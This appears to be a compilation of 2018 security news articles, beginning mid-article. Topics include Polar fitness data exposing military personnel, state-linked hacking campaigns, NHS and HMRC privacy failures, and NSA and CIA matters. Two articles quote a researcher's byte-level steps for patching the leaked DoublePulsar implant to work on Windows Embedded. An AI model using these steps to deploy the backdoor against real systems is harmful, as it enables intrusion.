“We can find Western military personnel in Afghanistan through the Polar site. Cross-checking one name and profile picture with social media confirmed one soldier or officer’s identity.”

Polar

The experts discovered detailed personal information, including home addresses, of military personnel, persons serving on submarines, Americans in the Green Zone in Baghdad and Russian soldiers in Crimea.

The exposure of such data poses serious risks to the military personnel as reported in a post published by Defensenews.com.

“Bellingcat was able to pinpoint the name of a “high-ranking officer” at a base known to host nuclear weapons. It took just a few clicks. Using the Polar Flow app and other information found on the internet, De Correspondent was able to collect a disturbing amount of one Dutch solider’s personal information.” reads the blog post published by Defensenews.com.

“They found the name of the solider, the fact he was stationed at one of the key locations where the war against the Islamic State is being waged from, the soldier’s home address, and the names of his wife and kids.”

In response to the privacy incident, Polar has disabled the feature that allowed users to share data and pointed out that any data made public was the result of users who opted in to location tracking.

The company has already implemented a number of measures to mitigate the exposure of its users along with the suspension for the Flow Explore feature until further notice.

The location tracking feature allows thousands of athletes daily all over the world to share and data related to their training sessions.

“If there hasn’t been a data breach, why have you suspended the Explore feature?

While the decision to opt-in and share training sessions and GPS location data is the choice and responsibility of the customer, we are aware that potentially sensitive locations were appearing in public data, and have made the decision to suspend the Explore until further notice.” reads the statement published by Polar.

“I have seen statements that suggest that Polar leaked data – Did Polar leak any data?Contrary to what has been reported—it’s important to clarify that Polar has not leaked any data. Furthermore, there has been no breach of private data.”

De Correspondent investigation revealed that only about two percent of Polar users chose to share their data, but journalists and experts were able to collect sensitive data from military or civilian personnel.

“We found the names and addresses of personnel at military bases including Guantanamo Bay in Cuba, Arbil in Iraq, Gao in Mali, and bases in Afghanistan, Saudi Arabia, Qatar, Chad, and South Korea,” states the De Correspondent report.


Chinese hackers breached into systems at Australian National University … and are still there
6.7.18 securityaffairs BigBrothers

Chinese hackers breached into the systems of Australian National University (ANU) and according to the experts they are still there.
Chinese hackers continue to target organizations worldwide, this time attackers based in China breached into the systems of Australian National University (ANU), one of the most prestigious Australian universities.

The bad news is that experts are still working to lock the hackers out because the threat is still active in the network of the Australian University.

“The ABC has been told the Australian National University (ANU) system was first compromised last year.” reported the ABC news.

The ANU had been working with intelligence agencies for several months to contain the threat and minimize its impact.

“The university has been working in partnership with Australian government agencies for several months to minimise the impact of this threat, and we continue to seek and take advice from Australian government agencies,” reads the official statement published by the Australian National University.

“Current assessments indicate no staff, student or research information has been taken and counter-measures are being undertaken.”

Chinese hackers

The Cyber Security Minister Angus Taylor pointed out that the Australian Government “condemns any malicious activity” that targets the systems of the country.

“We know that nation states and criminal groups actively target research and tertiary institutions to steal the intellectual property of hardworking Australians,” he said.

“Malicious cyber activity against Australia’s national interests, whether from criminal syndicates or foreign states, is increasing in frequency, sophistication and severity, and the Australian Government’s highest priority is ensuring Australians are safe and our interests are secure.”

Mr Taylor confirmed that the Australian Cyber Security Centre (ACSC) had been supporting ANU in this case.

“The Australian Cyber Security Centre works closely with any affected organisations to reduce the likelihood of threat actors being successful and to help them recover when they are compromised,” he said.

Australian systems are always under attack, in October 2016 a report published by the Australian Cyber Security Centre confirmed the Australian Bureau of Meteorology hack was powered by foreign cyber spies.

In December 2015 the Australian Broadcasting Corporation (ABC) revealed that a supercomputer operated by the Australian Bureau of Meteorology (BoM) was hit by a cyber attack. The Bureau of Meteorology is Australia’s national weather, climate, and water agency, it is the analog of the USA’s National Weather Service.

The supercomputer of the Australian Bureau of Meteorology targeted by the hackers is also used to provide weather data to defense agencies, its disclosure could give a significant advantage to a persistent attacker for numerous reasons.

Initial media reports blamed China for the cyber attack, in 2013 Chinese hackers were accused by authorities of stealing the top-secret documents and projects of Australia’s new intelligence agency headquarters.


Hamas cyber-operatives lure Israeli soldiers to spyware hidden in tainted apps

6.7.18 securityaffairs BigBrothers

Israeli military intelligence accused Hamas operatives of creating tainted apps to lure soldiers into downloading spyware onto their phones.
According to a report published by the Israeli military, Hamas hackers are attempting to lure Israel Defence Forces (IDF) soldiers into installing tainted apps on their devices.

Israeli military already blamed Hamas of similar attacks, but this time the hackers managed to serve the apps through the official Google Play Store to increase the likelihood of success.

The experts from the Israel firm ClearSky have identified the following apps:

WinkChat – com.winkchat.apk (dating app)
GlanceLove – com.coder.glancelove.apk (dating app)
Golden Cup – anew.football.cup.world.com.worldcup.apk (Wordcup app)
Hamas GlanceLove fake app

Hamas operatives created a number of fake Facebook profiles using photos of attractive women to lure IDF soldiers into private conversations, then trick them into installing one of the compromised apps.

Israeli military officials explained that Hamas operatives adopted the same tactic in a campaign launched in January-

In January, the hackers used the profile of a woman named “Elianna Amer,” in these last attacks, that lasted at least for three months, they used the profile of a woman named “Lina Kramer.”

“I got a message on Facebook that looked innocent at first, from someone named Lina Kramer, we started talking on Facebook, then we moved to Whatsapp, and then she asked me to download an app called GlanceLove,” explained a former IDF soldier.

“At this stage, my suspicion was final, and I decided to consult a friend who helped me understand that it was a fictitious profile with malicious intentions. From there I turned to the information security officer in my unit who helped me.”

According to Israeli army intelligence officers, the attacks failed to damage military security.

“No damage was done, as we stopped it in time,” one of the officers said.

Th Israeli newspaper Haaretz provided a different version of the facts, it reported that at least “hundreds” of soldiers were infected.

“Hamas managed to hack into the phones of hundreds of Israeli soldiers using dating and World Cup apps and managed to gather sensitive information about the military and some of its bases around the Gaza strip.” reported Haaretz.

“The apps allowed malicious software controlled by Hamas to be planted into Android smartphones, enabling militants in the Strip to access pictures, phone numbers and email addresses of soldiers posted close to the border, and even allowed Hamas to control the phones’ cameras and microphones remotely.”

The analysis of the apps revealed they were tainted with a spyware that can take over devices and exfiltrate sensitive data.

According to the experts, threat actor behind these attacks is codenamed Arid Viper.

In 2015, security experts at Trend Micro uncovered a cyber espionage campaign, dubbed Operation Arid Viper, that targeted Israeli institutions. The Operation Arid Viper was run by Arab-speaking hackers that sought to extract sensitive documents by sending phishing emails. The phishing campaigns targeted government office, infrastructure providers, a military organization, and academic institutions in Israel and Kuwait

In the past, security experts linked Hamas operatives to another APT tracked as Gaza Cybergang (Gaza Hackers Team or Molerats).


NHS Digital Erroneously Reveals Data of 150,000 Patients
5.7.18 securityweek BigBrothers

On Monday July 2, Jackie Doyle-Price, the parliamentary under-secretary of state for health, delivered a written statement to the UK parliament. It explained that 150,000 NHS patients who had specifically opted out of the NHS patient data-sharing regime were in fact not opted out.

"As a result," says the statement, "these objections were not upheld by NHS Digital in its data disseminations between April 2016, when the NHS Digital process for enabling them to be upheld was introduced, and 26 June 18. This means that data for these patients has been used in clinical audit and research that helps drive improvements in outcomes for patients."

NHS Digital is the national information and technology partner to the health and social care system. It has responsibility for standardizing, collecting and publishing data and information from across the health and social care system in England. It is therefore responsible for storing and disseminating NHS patient data to those qualified to receive it.

On the same day, NHS Digital released its own statement. "We apologize unreservedly for this issue, which has been caused by a coding error by a GP system supplier (TPP) and means that some people's data preferences have not been upheld when we have disseminated data. The TPP coding error meant that we did not receive these preferences and so have not been able to apply them to our data."

It seems that a software error in an application named SystmOne, written by software firm TPP and designed to allow patients to opt out of data sharing at their local NHS surgery, failed to record the objections. Those objections were therefore not relayed to NHS Digital. Since the system relies on patients opting out rather than opting in to data sharing, NHS Digital assumed that all patients had agreed.

The software error was detected on 28 June, three years after SystmOne was released, when TPP switched to a new system. Neither Jackie Doyle-Price nor NHS Digital has given figures on how many times this data might have been erroneously shared externally during this period. However, NHS Digital compiles and publishes a register of organizations that receive patient data. The most recent publication (XLS) covers the period from December 2017 to February 18. It shows that patient data was shared more than 5,300 times in these three months.

It also shows where the data shared is considered to be sensitive or non-sensitive, and whether the data was anonymized or is identifiable. The anonymization is performed in accordance with the UK data protection regulator's requirements; but many privacy activists do not believe that anonymization is irreversible.

"As part of our commitment to the secure and safe handling of health data, on 25 May 18 [the date on which GDPR became required] the Government introduced the new national data opt-out. The national data opt-out replaces Type 2 objections. This has simplified the process of registering an objection to data sharing for uses beyond an individual's care. The new arrangements give patients direct control over setting their own preferences for the secondary use of their data and do not require the use of GP systems, and therefore will prevent a repeat of this kind of GP systems failure in the future."

It remains an opt-out of data sharing rather than an opt-in to data sharing -- the latter being generally required by GDPR.

Dr John Parry, Clinical Director at TPP, said: "TPP and NHS Digital have worked together to resolve this problem swiftly. The privacy of patient data is a key priority for TPP, and we continually make improvements to our system to ensure that patients have optimum control over information. In light of this, TPP apologizes unreservedly for its role in this issue."

NHS Digital added, "We are confident that we are now respecting all opt-outs that have been recorded in the system. We will also be contacting organizations with whom we have shared data that may have been affected, and work with them to destroy the data where possible."

In an emailed comment, Mike Smart, a security strategist at Forcepoint, told SecurityWeek, "In this case, it appears the underlying program left patient data exposed, even though each party involved in handling the data was aware of the privacy policy settings. It's a clear indicator that relying too heavily on software will cause these mistakes to happen in the future. We can't afford to leave out the human element when deciding how we protect sensitive data, and must involve creative and lateral thinking in the testing and final checking stage before software goes live."


Israel Accuses Hamas of Targeting Soldiers With World Cup App
4.7.18 securityweek BigBrothers

Tel Aviv - Israeli military intelligence on Tuesday accused Hamas hackers of creating a World Cup app and two online dating sites to tempt soldiers into downloading spyware onto their phones.

Briefing journalists at national defence headquarters in Tel Aviv, army intelligence officers said the scam by members of the Palestinian Islamist movement that runs the Gaza Strip failed to damage military security.

"No damage was done, as we stopped it in time," one of the officers said, with the military's response codenamed "Operation Broken Heart".

But he said the attempt showed the Islamist militants had adopted new tactics since a similar attempt was revealed in January 2017.

The emphasis then was solely on the dating game, with the hackers posing online as attractive young women seeking to lure men in uniform into long chats.

This time the traps were aimed at both sexes and there was the additional bait of World Cup action with an app offering "HD live streaming of games, summaries and live updates".

Attackers used stolen identities to create more convincing fake Facebook profiles of young Israelis, written in fluent Hebrew studded with current slang.

"What Hamas is bringing to the table is a very good knowledge of our young people and their state of mind," another officer said. Asked how he could be sure Hamas was behind the online offensive, he declined to say but insisted there was no doubt.

The assailants uploaded their custom-built Golden Cup, Wink Chat and Glance Love applications to the Google Store, to make them seem legitimate, according to the officers.

Using Facebook sharing and Whatsapp messages, they urged young men and women performing Israel's compulsory military service to download the infected apps.

Once on the recipient's phone, officers said, the device could be taken over to covertly take and send photographs, eavesdrop on conversations, copy stored files and pictures and transmit location details.

But in most cases, they said, soldiers did not download the apps and informed their superiors of their suspicions.

Google has since deleted the apps from its store, they added.

They said that awareness of the potential risk had soared since the army publicised the previous attempts.

"Thanks to the soldiers' vigilance, Hamas' intelligence infrastructure was exposed before it caused actual security damage," army briefing notes said. Israel and Palestinian militants in Gaza have fought three wars since 2008.

In March 2016 a Palestinian from Gaza was charged with hacking into Israeli military drones.


Iranian Hackers Impersonate Israeli Security Firm
4.7.18 securityweek BigBrothers

A group of Iranian hackers focused on cyber-espionage recently built up a website to impersonate ClearSky Cyber Security, the Israeli firm that exposed their activities not long ago.

The hackers, tracked as APT35 and also known as NewsBeef, Newscaster, and Charming Kitten, have been active since at least 2011, with their activities detailed for the first time several years ago.

In December 2017, ClearSky Cyber Security published a report detailing the group’s activities during the 2016-2017 timeframe. The security firm not only described the actor’s infrastructure, but also provided information on DownPaper, a new piece of malware the hackers had been using.

The security firm exposed the link between the group and Behzad Mesri, also known as Skote Vahshat, who was charged in November 2017 with the hacking of HBO. Furthermore, the researchers also managed to establish the identity of two other alleged members of the group.

Roughly half a year after the report was published, the security firm announced on its Twitter account that the hackers built their own site impersonating ClearSky.

“#CharmingKitten built a phishing website impersonating our company. The fake website is clearskysecurity\.net (the real website is http://clearskysec.com),” the security firm announced.

The advanced persistent threat (APT) apparently copied entire pages from the legitimate website, but also changed one of them to include a sign in option with multiple services. Anyone entering credentials there would have had them sent to the actor instead.

“These sign in options are all phishing pages that would send the victim's credentials to the attackers. Our legitimate website does not have any sign in option. It seems that the impersonating website is still being built because some of the pages have error messages in them,” the security firm announced.

One of the pages on the fake website, the security researchers discovered, featured content related to a Charming Kitten campaign that ClearSky exposed only several weeks ago. That page, however, wasn’t customized to look like the security firm’s website.

The fake website started being flagged as deceptive soon after ClearSky discovered it. The security firm says that its employees, services, and customers were not affected.

Over the past years, security researchers managed to link various hacking groups to Iran, including APT33, Rocket Kitten, Magic Hound, and CopyKittens, and even revealed that they tend to share infrastructure and malware code.


NSA began deleting all call detail records (CDRs) acquired since 2015
3.7.18 securityaffairs BigBrothers

NSA is deleting hundreds of millions of records of phone calls and text messages dating back to 2015 due to technical irregularities.
The US National Security Agency announced it is deleting hundreds of millions of records of phone calls and text messages dating back to 2015 due to technical irregularities in some data received from telecommunications service providers.

“Consistent with NSA’s core values of respect for the law, accountability, integrity, and transparency we are making public notice that on May 23, 18, NSA began deleting all call detail records (CDRs) acquired since 2015 under Title V of the Foreign Intelligence Surveillance Act (FISA)” reads the announcement published by the NSA.

“NSA is deleting the CDRs because several months ago NSA analysts noted technical irregularities in some data received from telecommunications service providers. “

Title V of the Foreign Intelligence Surveillance Act (FISA) and the USA Freedom Act of 2015 allow the intelligence agencies to collect call metadata related to certain types of calls involving persons of interest whom activity may pose a threat to the homeland security.

The National Security Agency received more call detail records (CDRs) that it was allowed to retain under the current law framework.

The NSA decided to destroy the data because it was infeasible to identify and isolate properly produced data

“Consequently, NSA, in consultation with the Department of Justice and the Office of the Director of National Intelligence, decided that the appropriate course of action was to delete all CDRs. NSA notified the Congressional Oversight Committees, the Privacy and Civil Liberties Oversight Board, and the Department of Justice of this decision.” continues the announcement.

The National Security Agency started to delete malformed CDRs on May 23, this year, more than a month ago.

NSA

The intelligence Agency also confirmed to have addressed the root cause of the problem for future CDR acquisitions.

The National Security Agency reported the problem to the Congressional Oversight Committees, the Privacy and Civil Liberties Oversight Board, and the Department of Justice that notified it to the Foreign Intelligence Surveillance Court.

This isn’t the first time that such kind of incident occurs, civil liberties journalist Marcy Wheeler published last year a catalog for all the times the National Security Agency had violated FISA since the Stellar Wind phone dragnet went under FISA in 2004.


Russia Expert to Lead Canada's Electronic Eavesdropping Agency
29.6.18 securityweek  BigBrothers

A Russia expert was appointed Wednesday to lead Canada's electronic eavesdropping agency, amid ongoing concerns of Russian hacking and meddling in Western elections.

Shelly Bruce moves up from number two at the Communications Security Establishment (CSE) to replace her former boss, outgoing CSE head Greta Bossenmaier.

Bruce studied Russia and Slavic languages at university before joining the CSE in 2004 as director of intelligence, and quickly moved up the ranks.

Her appointment as the head of the CSE comes only two months after Ottawa moved to safeguard Canada's elections from cyber threats and "foreign interference," following accusations of Russia meddling in the last US election, which Russia has denied.

Canada's next federal election is scheduled for 2019.

Also in April, G7 foreign ministers called on Russia to come clean about a nerve agent attack on a former spy in Britain, calling it in a joint statement "a threat to us all."

Western nations had a month prior expelled 150 Russian diplomats in a coordinated action against Moscow in support of Britain, and Russia retaliated with similar moves.

They included four diplomats serving at either Russia's embassy in Ottawa or its consulate in Montreal who were "identified as intelligence officers or individuals who have used their diplomatic status to undermine Canada's security or interfere in our democracy," Foreign Minister Chrystia Freeland said then.

Canada is a member the US-led Five Eyes intelligence gathering alliance.

The CSE last year urged Ottawa to step up its hacking countermeasures, after identifying between 2013 and 2015 approximately 2,500 state-sponsored hacking attempts.


Ops … the DoublePulsar NSA-Linked implant now works also on Windows Embedded devices
28.6.18 securityaffairs BigBrothers

This is a very bad news for security community, the NSA-linked DoublePulsar exploit can now target Windows Embedded devices.
The DoublePulsar exploit was released publicly in April 2017 by ShadowBrockers hackers that allegedly stole them from the NSA.

The hackers leaked a huge trove of hacking tools and exploit codes used by the US intelligence agency, most of Windows exploits were addressed by Microsoft the month before.

DoublePulsar is sophisticated SMB backdoor that could allow attackers to control the infected systems since its leak it was working on almost any Windows system except on devices running a Windows Embedded operating system.

News of the day is that a security researcher who uses the online with the moniker of Capt. Meelo has developed a version of the DoublePulsar exploit code that also works on devices running a Windows Embedded operating system.

The experts discovered that even if the devices running a Windows Embedded operating system are vulnerable to the exploits, the relevant Metasploit modules wouldn’t work on them.

To confirm this hypothesis, the researcher used the NSA FuzzBunch exploit code and discovered that the target device was indeed vulnerable via the EternalBlue exploit.

“I then quickly used the EternalBlue module and the result was successful – the backdoor was successfully installed on the target. So I guessed the authors of the MSF exploit modules just forgot to add the support for Windows Embedded version. ” wrote the expert in a blog post.

“Since the backdoor was already installed, the last thing that needs to be done to complete the exploitation and gain a shell was to use DoublePulsar.”

Summarizing the expert was able to exploit the EternalBlue attack against the target device but the deployment of the DoublePulsar backdoor was failing , so the researcher decided to analyze the implant to discover why.

What he found was that one simple line of code was enough to make it work on Windows Embedded.

DoublePulsar was designed to check the Windows version on the target machine and take one installation path on Windows 7 or another (and perform other OS checks) on other platform iterations. However, there was no check for Windows Embedded, which generated an error message.

By simply modifying an instruction in the “Windows 7 OS Check,” the researcher was able to force the implant into taking that specific installation path.

“To do this, I went to Edit > Patch program > Change byte. Then I changed the value 74 (opcode of JZ) to 75 (opcode of JNZ). I then created a DIF file by going to File > Produce file > Create DIF file,” Capt. Meelo explains.

The expert used the @stalkr_’s script (https://stalkr.net/files/ida/idadif.py) to patch the modified exe file. and then moved the modified Doublepulsar-1.3.1.exe back to its original location.

This trick allowed him to inject the generated DLL payload to the target host.


France Also Interested in Greece's Russian Bitcoin Suspect
28.6.18 securityweek BigBrothers

France has joined the US and Russia in seeking the extradition of a Russian held in Greece for allegedly laundering $4 billion using the bitcoin digital currency, a court source said Wednesday.

The French warrant says Alexander Vinnik, who headed bitcoin exchange BTC-e, had defrauded over 100 people in six French cities between 2016 and 18.

He is sought for extortion, money laundering and crimes committed online, the court source said.

Vinnik has been held in jail since his arrest last July in the northern Greek tourist resort of Halkidiki. He denies the accusation.

He was indicted by a US court last year on 21 charges ranging from identity theft and facilitating drug trafficking to money laundering.

Greece's Supreme Court in December said Vinnik should be extradited to the US, but the final decision is up to the Greek justice minister.

Russia has also filed a demand to extradite Vinnik so he can stand trial on separate fraud charges.

BTC-e, founded in 2011, became one of the world's largest and most widely used digital currency exchanges.

According to the US indictment, it was "heavily reliant on criminals".

In addition, BTC-e "was noted for its role in numerous ransomware and other cyber-criminal activity".

It allegedly received more than $4 billion (3.5 billion euros) worth of Bitcoin over the course of its operation.

Vinnik was also charged with receiving funds from the infamous hack of Mt. Gox -- an earlier digital currency exchange that eventually failed, in part due to losses attributable to hacking.

The US Treasury Department has slapped BTC-e with a $110 million fine for "wilfully violating" US anti-money laundering laws. Vinnik himself has been ordered to pay $12 million.

In Russia, Vinnik is wanted on separate fraud charges totalling 9,500 euros.

He has said he would accept extradition to his home country.


NSA-Linked Implant Patched to Work on Windows Embedded
28.6.18 securityweek BigBrothers

DoublePulsar, one of the hacking tools the Shadow Brokers supposedly stole from the National Security Agency (NSA)-linked Equation Group, can now run on Windows Embedded devices.

The backdoor was released publicly in April last year along with a variety of Windows exploits that Microsoft had patched the month before. It is a sophisticated, multi-architecture SMB (Server Message Block) backdoor that can stay well hidden on infected machines.

In addition to SMB, it is also used as the primary payload in RDP (Remote Desktop Protocol) exploits in the NSA’s FuzzBunch software (an exploitation framework that resembles Rapid7’s Metasploit).

As it turns out, although it would work on a wide range of Windows releases, DoublePulsar wouldn’t work on devices running a Windows Embedded operating system, even if the platform itself is vulnerable to the NSA-linked exploits, a security researcher who uses the online handler of Capt. Meelo says.

Windows Embedded, the researcher discovered, was indeed vulnerable to the exploits, but the relevant Metasploit modules wouldn’t work on it. Using FuzzBunch, however, he verified that the target device was indeed vulnerable via the EternalBlue exploit.

While exploitation via the EternalBlue module and the result were successful, the installation of DoublePulsar failed, so the researcher decided to analyze the implant to discover why.

What he found was that one simple line of code was enough to make it work on Windows Embedded.

DoublePulsar was designed to check the Windows version on the target machine and take one installation path on Windows 7 or another (and perform other OS checks) on other platform iterations. However, there was no check for Windows Embedded, which generated an error message.

By simply modifying an instruction in the “Windows 7 OS Check,” the researcher was able to force the implant into taking that specific installation path.

“To do this, I went to Edit > Patch program > Change byte. Then I changed the value 74 (opcode of JZ) to 75 (opcode of JNZ). I then created a DIF file by going to File > Produce file > Create DIF file,” Capt. Meelo explains.

Using a script from a security enthusiast who calls himself StalkR, he then patched the modified .exe file and then moved the modified Doublepulsar-1.3.1.exe back to its original location. This resulted in a successful injection of the generated DLL payload to the target host.


North Korean Hackers Exploit HWP Docs in Recent Cyber Heists
26.6.18 securityweek  BigBrothers

A series of malicious Hangul Word Processor (HWP) documents used in recent attacks on cryptocurrency exchanges have been attributed to the North Korea-linked Lazarus group, AlienVault reports.

The attacks appear to include the recent assault on Bithumb, the largest virtual currency exchange in South Korea, with more than 1 million customers. As part of the incident, hackers managed to steal over $30 million worth of cryptocurrencies.

Lazarus, or BlueNoroff, is a state-sponsored hacking group believed to have launched the $81 million cyber heist from the Bangladesh Bank in 2016 and considered the most serious threat against banks. Earlier this year, the group was observed hitting an online casino in Central America and switching interest to crypto-currency.

Earlier this month, AlienVault revealed that Lazarus has been leveraging a new ActiveX vulnerability in attacks on South Korean targets. Now, the security firm says that the hackers have also been using a series of malicious documents to target members of a recent G20 Financial Meeting.

AlienVault's security researchers analyzed three similar malicious documents that have been already associated with Lazarus. One of these mentions the G20 International Financial Architecture Working Group meeting, seeking coordination of the economic policies between the wealthiest countries.

The HWP files include malicious code that fetches next stage malware (either a 32 or 64 bit version of Manuscrypt, which has been already detailed by other security researchers), a threat communicated by impersonating South Korean forum software. Decoy documents of resumes were also included.

A series of reports within South Korea have already suggested that malicious HWP files were used earlier in May and June to set up the Bithumb heist, and that these documents appear linked to previous attacks by Lazarus.

The investigation of a South Korean security company into the thefts also revealed that fake resumes strikingly similar to those delivering the Lazarus-linked Manuscrypt were sent to cryptocurrency organizations.

“Whilst we can’t be certain this malware is responsible for the thefts from Bithumb, it seems a likely suspect,” AlienVault notes.

Related malicious HWP documents from Lazarus have been reportedly targeting crypto-currency users in South Korea earlier this month.

Furthermore, the researchers noticed cryptocurrency phishing domains registered to the same phone number as a domain (itaddnet[.]com) and delivering some of the malware. This would suggest the attackers are also phishing for credentials, in addition to delivering malware.

“It is unusual to see Lazarus registering domains - normally they prefer to compromise legitimate websites. So this would be an unusual attack if it is indeed run by members of Lazarus,” AlienVault says.

Apparently, it would be entirely possible for Lazarus to have hacked Bithumb earlier this month, considering that the group raided the exchange last year as well, which likely provided them with the necessary knowledge to do it again. Over the past year, the group targeted other crypto-currency exchanges as well.

“It’s clear that the thefts from Lazarus won’t stop anytime soon given the gains available - the (partially successful) attempt to steal $1 billion dollars from the Bank of Bangladesh represents 3% of North Korea’s reported GDP. Thefts from South Korean organizations have the double impact of weakening their closest competitor,” AlienVault said.


UK Tax Agency HMRC has recorded the voice tracks of 5.1 Million Brits
25.6.18 securityaffairs BigBrothers

The UK-based privacy group Big Brother Watch revealed that the British tax agency HMRC has recorded the voice of over 5.1 million Britons.
The UK-based privacy and civil liberties group Big Brother Watch has revealed that the British tax agency HMRC (Her Majesty’s Revenue and Customs) has recorded the voice of over 5.1 million Britons.

The Her Majesty’s Revenue and Customs agency collected these voice records via the Voice ID service that was launched in January 2017. The service was created to allow UK citizens to authenticate when calling HMRC call centers using their voice.

When the service was initially launched, the tax agency claimed users would be able to opt out of using it and continue to authenticate themselves by using usual methods.

The Big Brother Watch group discovered that there’s no opt-out option when users call the agency support line.

Every citizen accessing the service recorded a voice track to use with the Voice ID authentication feature

“Far from ‘encouraging’ customers, HMRC offers no choice but to do as the automated system instructs and create a biometric voice ID for a Government database.” reads the Big Brother Watch.

“In our investigation, we found that the only way to avoid creating a voice ID is to say “no” to the system – three times – before the system resolves to create your voice ID “next time”.”

Advocated at the Big Brother Watch group claim the HMRC is outlaw because it doesn’t provide a clear way of opting out and because there is no way to ask the agency to remove voice track from HMRC’s database.

The Big Brother Watch filed freedom of information (FOIA) requests, but the tax agency refused to provide instruction to the users on how to delete their voice tracks from HMRC’s database.

 HMRC

Another aspect that is still under investigation is how the agency manages voice tracks and if it shares them with third-parties and government agencies.

It is clear that the that the Her Majesty’s Revenue and Customs agency is not in compliance with the GDPR regulation that was adopted by EU member states.

Big Brother Watch officials are inviting Britons to file a complaint with the HMRC and with the UK’s Information Commissioner’s Office (ICO), this latter already started an official investigation into HMRC’s process.


Supreme Court of the US Police ruled that police need warrant for mobile location data
24.6.18 securityaffairs BigBrothers

The Supreme Court of the US ruled that police must obtain a search warrant before obtaining mobile location data from mobile carriers and similar services.
The Supreme Court of the United States ruled this week that law enforcement must obtain a search warrant before obtaining cell phone location information from mobile carriers or third-party services.

“When the government tracks the location of a cell phone it achieves near perfect surveillance, as if it had attached an ankle monitor to the phone’s user,” Chief Justice John Roberts wrote in the 5-4 opinion.” reported The Wall Street Journal.

“Unlike the nosy neighbor who keeps an eye on comings and goings,” he wrote, the signal towers and processing centers that track cellphone users “are ever alert, and their memory is nearly infallible,” making analog-era precedents prosecutors cited to justify such warrantless searches all but obsolete.”

location data

The decision aims at preventing surveillance activities operated by the government and protecting the privacy of the citizens under the Fourth Amendment.

The Supreme Court ruled that a warrant is also needed to access location data stored by mobile carriers and similar companies, this data allows to monitor almost any activity of citizens.

“While individuals regularly leave their vehicles, they compulsively carry cell phones with them all the time. A cell phone faithfully follows its owner beyond public thoroughfares and into private residences, doctor’s offices, political headquarters, and other potentially revealing locales.” continues Chief Justice John Roberts.

“Critically, because location information is continually logged for all of the 400 million
devices in the United States – not just those belonging to persons who might happen to come under investigation – this newfound tracking capacity runs against everyone.”

Of course, the authorities can operate without a warrant when there are situations of danger for life of citizens or when handling national security issues.

The ruling came in the wake of Timothy Carpenter v. US case filed in 2011, when the US police arrested members of a gang who committed armed robberies at several stores.

Gang members confessed the group was led by Timothy Carpenter, a version that was verified by the Police obtaining a court order for Carpenter’s cell phone location information and verifying the presence of the suspect near the robberies.

Carpenter was condemned to more than 100 years in prison, but lawyers for the American Civil Liberties Union that represented him at the high court defined the decision “a truly historic vindication of privacy rights.”

The lawyers argued that a court order should not have been enough to obtain access to the mobile’s location data of the suspect, and a search warrant should have been obtained instead.

The Supreme Court ruling was praised by privacy advocated because it aims at defending the privacy of the citizens against any abuse.


China-Linked 'Thrip' Spies Target Satellite, Defense Companies
20.6.18 securityweek BigBrothers

A China-linked cyber espionage group has breached the systems of satellite operators, telecommunications companies and defense contractors in the United States and Southeast Asia, Symantec reported on Tuesday.

Symantec has been tracking the threat actor, which it has named “Thrip,” since 2013. However, the security firm says the group’s activities have not been made public until now.

Thrip has used a combination of custom malware and legitimate tools in its attacks. One victim was a satellite communications operator, where the hackers targeted devices involved in operations, as well as systems running software designed for monitoring and controlling satellites.

“This suggests to us that Thrip’s motives go beyond spying and may also include disruption,” Symantec researchers said.

Thrip has also targeted a company specializing in geospatial imaging and mapping. The attackers attempted to gain access to machines hosting MapXtreme GIS, Google Earth Server and Garmin imaging software.

The list of victims identified by Symantec also includes three telecoms firms in Southeast Asia. The companies themselves appear to have been Thrip’s targets rather than their customers. Another victim is a defense contractor, but no details have been shared by the security firm on this attack.

Symantec has been monitoring Thrip since 2013, when it spotted a campaign conducted from systems located in China. The group initially relied mostly on custom malware, but more recent campaigns, which started last year, also involved legitimate tools.

The pieces of malware used by the group include Trojan.Rikamanu, a trojan designed for stealing credentials and other information from compromised systems, and Infostealer.Catchamas, an evolution of Rikamanu that includes improved data theft and anti-detection capabilities.

Thrip has also been spotted using Trojan.Mycicil, a keylogger offered on Chinese underground marketplaces but which has not been seen often, and Backdoor.Spedear and Trojan.Syndicasec, both of which have been observed in the group’s older campaigns.

As for the legitimate tools used by the cyberspies, the list includes the Windows SysInternals utility PSExec, PowerShell, the post-exploitation tool Mimikatz, the open source FTP client WinSCP, and the LogMeIn remote access software.

“This is likely espionage,” said Greg Clark, CEO of Symantec. “The Thrip group has been working since 2013 and their latest campaign uses standard operating system tools, so targeted organizations won’t notice their presence. They operate very quietly, blending in to networks, and are only discovered using artificial intelligence that can identify and flag their movements. Alarmingly, the group seems keenly interested in telecom, satellite operators, and defense companies. We stand ready to work with appropriate authorities to address this serious threat.”


Ex-CIA Employee Charged With Leaking Agency's Hacking Tools
19.6.18 securityweek BigBrothers

A former employee of the U.S. Central Intelligence Agency (CIA) has been charged with stealing classified national defense information from the agency and sharing it with WikiLeaks.

The Department of Justice announced on Monday that Joshua Adam Schulte, 29, of New York, New York, had been charged in a 13-count indictment. The indictment does not specifically name WikiLeaks, but the media revealed last month that authorities had been preparing to charge Schulte for providing WikiLeaks the CIA hacking tools that were published by the whistleblower organization as part of its Vault 7 leak.

Schulte worked for the NSA for five months in 2010 as a systems engineer. He then joined the CIA, where he worked as a software engineer until November 2016, when he moved to New York City and started working as a software engineer for Bloomberg.

The man reportedly became the main suspect for the Vault 7 leaks one week after WikiLeaks started releasing files. However, when investigators searched his apartment and devices, they uncovered a file sharing server hosting child pornography.

Schulte was charged on three counts of receipt, possession and transportation of child pornography in August 2017 and was released the following month. He was arrested again in December for violating the conditions of his release and he has been in custody ever since.

Schulte has now been charged with illegal gathering of national defense information; illegal transmission of lawfully possessed national defense information; illegal transmission of unlawfully possessed national defense information; unauthorized access to a computer to obtain classified information; theft of Government property; unauthorized access of a computer to obtain information from a Department or Agency of the United States; and causing transmission of a harmful computer program, information, code, or command.

The list of charges also includes making material false statements to representatives of the FBI; obstruction of justice; receipt of child pornography; possession of child pornography; transportation of child pornography; and copyright infringement. If convicted, the man could spend decades behind bars.

The hacking-related charges involve Schulte’s activities inside the CIA’s networks while being employed by the agency.

"Joshua Schulte, a former employee of the CIA, allegedly used his access at the agency to transmit classified material to an outside organization,” said Geoffrey S. Berman, US Attorney for the Southern District of New York. “During the course of this investigation, federal agents also discovered alleged child pornography in Schulte’s New York City residence. We and our law enforcement partners are committed to protecting national security information and ensuring that those trusted to handle it honor their important responsibilities. Unlawful disclosure of classified intelligence can pose a grave threat to our national security, potentially endangering the safety of Americans.”

Schulte previously pleaded not guilty to the child pornography-related charges, claiming that up to 100 people had access to the server storing illegal content. Investigators, on the other hand, claim they have proof Schulte had been aware of the presence of the files.

